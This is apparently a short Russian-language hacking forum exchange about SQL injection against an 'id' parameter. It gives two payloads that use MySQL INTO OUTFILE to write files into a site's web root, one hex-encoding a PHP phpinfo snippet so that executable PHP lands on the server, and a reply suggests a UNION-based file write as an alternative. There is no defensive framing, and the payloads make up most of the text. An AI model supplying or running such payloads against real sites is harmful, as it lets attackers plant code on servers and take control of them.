Code: id=' AND 1=0 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/var/www/vulnsite.com/test.txt' lines terminated by "<? php code ?>"),floor(rand(0)*2)))
А так? Code: id=' AND 1=0 AND ((SELECT CONCAT(0x3c3f70687020706870696e666f2829203b203f3e) INTO OUTFILE '/var/www/vulnsite.com/test9110.txt'))+--+
Это очень удивительно, что подобная конструкция работает, если учесть всю её абсурдность(какая там версия mysql'а, что в ней подобное работает ?), а операторы insert,delete случаем в скобках не работают ? А по делу: попробуйте по-старинке, union'ом сделать вывод в файл, может получится.